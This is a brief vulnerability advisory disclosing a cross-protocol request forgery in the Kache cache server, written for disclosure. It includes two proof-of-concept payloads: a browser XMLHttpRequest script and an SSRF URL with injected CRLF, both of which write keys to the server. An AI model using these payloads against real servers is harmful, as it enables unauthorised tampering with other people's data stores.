# Title: Kache / CPRF
# Date: 03/01/2019
# Discovered by: @codexlynx
# Software Version: <= Commit: de2c39491625c3f087027be961a17191e85f6d30 (For now they don't version)
# Category: go, resp, cprf

[1]CPRF (Cross Protocol Request Forgery)
--------------------------------
Kache server don't close connection when unknown strings are received. This can allow to a malicious actor to perform cross protocol interactions.

 - POC 1: Set a key by HTTP:

<script>
   var x = new XMLHttpRequest();
   x.open("POST", "http://<TARGET_ADDRESS>:<TARGET_PORT>");
   x.send("set mykey myvalue\n");
</script>

 - POC 2: Exploit this CPRF for set a key via SSRF + CRLF Injection:

https://<VULNERABLE_TARGET>/ssrf.php?url_to_post=http://<KACHE_ADDRESS>:<KACHE_PORT>/%0D%0Aset%20mykey%20myvalue